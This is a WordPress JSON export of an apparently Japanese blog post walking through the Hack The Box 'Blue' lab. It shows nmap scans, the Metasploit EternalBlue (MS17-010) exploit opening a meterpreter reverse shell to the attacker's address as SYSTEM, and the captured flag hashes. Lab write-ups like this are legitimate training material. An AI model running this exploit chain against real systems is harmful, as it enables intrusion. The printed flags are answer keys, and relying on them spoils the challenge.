{"id":3725,"date":"2020-08-11T23:17:48","date_gmt":"2020-08-11T14:17:48","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3725"},"modified":"2020-08-30T23:34:15","modified_gmt":"2020-08-30T14:34:15","slug":"hack-the-box-blue-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3725","title":{"rendered":"Hack The Box – Blue – Walkthrough"},"content":{"rendered":"

SMB\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n
\r\n# nmap -A -n -F -T5 blue.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 11:42 UTC\r\nNmap scan report for blue.htb (10.10.10.40)\r\nHost is up (0.049s latency).\r\nNot shown: 91 filtered ports\r\nPORT      STATE SERVICE      VERSION\r\n135\/tcp   open  msrpc        Microsoft Windows RPC\r\n139\/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn\r\n445\/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\r\n49152\/tcp open  msrpc        Microsoft Windows RPC\r\n49153\/tcp open  msrpc        Microsoft Windows RPC\r\n49154\/tcp open  msrpc        Microsoft Windows RPC\r\n49155\/tcp open  msrpc        Microsoft Windows RPC\r\n49156\/tcp open  msrpc        Microsoft Windows RPC\r\n49157\/tcp open  msrpc        Microsoft Windows RPC\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer|general purpose\r\nRunning (JUST GUESSING): HP embedded (89%), FreeBSD 8.X|6.X|7.X (88%), Apple Mac OS X 10.6.X|10.7.X (88%), IBM AIX 4.X (85%)\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000 cpe:\/o:freebsd:freebsd:8.0 cpe:\/o:apple:mac_os_x:10.6.2 cpe:\/o:apple:mac_os_x:10.7.4 cpe:\/o:freebsd:freebsd:6.2 cpe:\/o:freebsd:freebsd:7.0 cpe:\/o:ibm:aix:4.3\r\nAggressive OS guesses: HP 170X print server or Inkjet 3000 printer (89%), FreeBSD 8.0-CURRENT (88%), Apple Mac OS X 10.6.2 (Snow Leopard) (Darwin 10.2.0) (88%), Apple Mac OS X 10.7.4 (Lion) (Darwin 11.4.0) (87%), FreeBSD 6.2-RELEASE-p2 (pf with scrub enabled) (86%), HP LaserJet 4250 printer (86%), FreeBSD 7.0-RELEASE (85%), IBM AIX 4.3 (85%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: Host: HARIS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\nHost script results:\r\n|_clock-skew: mean: -14m30s, deviation: 34m37s, median: 5m27s\r\n| smb-os-discovery:\r\n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\r\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\r\n|   Computer name: haris-PC\r\n|   NetBIOS computer name: HARIS-PC\\x00\r\n|   Workgroup: WORKGROUP\\x00\r\n|_  System time: 2020-08-11T12:49:11+01:00\r\n| smb-security-mode:\r\n|   account_used: guest\r\n|   authentication_level: user\r\n|   challenge_response: supported\r\n|_  message_signing: disabled (dangerous, but default)\r\n| smb2-security-mode:\r\n|   2.02:\r\n|_    Message signing enabled but not required\r\n| smb2-time:\r\n|   date: 2020-08-11T11:49:10\r\n|_  start_date: 2020-08-10T16:25:02\r\n<\/pre>\n
SMB\u306e\u8106\u5f31\u6027\u3092\u63a2\u3059<\/h3>\n
\r\n# nmap --script vuln -p 445 10.10.10.40\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 13:58 UTC\r\nNmap scan report for 10.10.10.40\r\nHost is up (0.028s latency).\r\n\r\nPORT    STATE SERVICE\r\n445\/tcp open  microsoft-ds\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n\r\nHost script results:\r\n|_smb-vuln-ms10-054: false\r\n|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND\r\n| smb-vuln-ms17-010:\r\n|   VULNERABLE:\r\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\r\n|     State: VULNERABLE\r\n|     IDs:  CVE:CVE-2017-0143\r\n|     Risk factor: HIGH\r\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\r\n|        servers (ms17-010).\r\n|\r\n|     Disclosure date: 2017-03-14\r\n|     References:\r\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\r\n|       https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\r\n|_      https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 40.22 seconds\r\n<\/pre>\n
ms17-010\u3092\u8d77\u70b9\u306b\u653b\u6483\u3059\u308b<\/h3>\n
\r\n# msfconsole\r\n\r\nmsf5 > search ms17-010\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                           Disclosure Date  Rank     Check  Description\r\n   -  ----                                           ---------------  ----     -----  -----------\r\n   0  auxiliary\/admin\/smb\/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\r\n   1  auxiliary\/scanner\/smb\/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection\r\n   2  exploit\/windows\/smb\/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\r\n   3  exploit\/windows\/smb\/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+\r\n   4  exploit\/windows\/smb\/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\r\n   5  exploit\/windows\/smb\/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\r\n\r\n\r\nInteract with a module by name or index, for example use 5 or use exploit\/windows\/smb\/smb_doublepulsar_rce\r\n\r\nmsf5 exploit(windows\/smb\/smb_doublepulsar_rce) > use 2\r\n[*] No payload configured, defaulting to windows\/x64\/meterpreter\/reverse_tcp\r\n\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) > set RHOSTS blue.htb\r\nRHOSTS => blue.htb\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) > set LHOST 10.10.14.13\r\nLHOST => 10.10.14.13\r\nmsf5 exploit(windows\/smb\/ms17_010_eternalblue) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.13:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] 10.10.10.40:445 - Using auxiliary\/scanner\/smb\/smb_ms17_010 as check\r\n[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)\r\n[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)\r\n[*] 10.10.10.40:445 - Connecting to target for exploitation.\r\n[+] 10.10.10.40:445 - Connection established for exploitation.\r\n[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply\r\n[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)\r\n[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes\r\n[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv\r\n[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1\r\n[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\r\n[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.\r\n[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet\r\n[*] 10.10.10.40:445 - Starting non-paged pool grooming\r\n[+] 10.10.10.40:445 - Sending SMBv2 buffers\r\n[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\r\n[*] 10.10.10.40:445 - Sending final SMBv2 buffers.\r\n[*] 10.10.10.40:445 - Sending last fragment of exploit packet!\r\n[*] 10.10.10.40:445 - Receiving response from exploit packet\r\n[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\r\n[*] 10.10.10.40:445 - Sending egg to corrupted connection.\r\n[*] 10.10.10.40:445 - Triggering free of corrupted buffer.\r\n[*] Sending stage (201283 bytes) to 172.17.0.1\r\n[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:36008) at 2020-08-11 14:10:01 +0000\r\n[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n\r\nmeterpreter > getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\nmeterpreter > shell\r\nProcess 2780 created.\r\nChannel 1 created.\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nC:\\Windows\\system32>cd C:\\Users\r\ncd C:\\Users\r\n\r\nC:\\Users>type haris\\Desktop\\user.txt\r\ntype haris\\Desktop\\user.txt\r\n4c546aea7dbee75cbd71de245c8deea9\r\nC:\\Users>type administrator\\Desktop\\root.txt\r\ntype administrator\\Desktop\\root.txt\r\nff548eb71e920ff6c08843ce9df4e717\r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
SMB\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 blue.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-11 11:42 UTC Nmap  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3725"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725\/revisions"}],"predecessor-version":[{"id":3787,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3725\/revisions\/3787"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3725"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}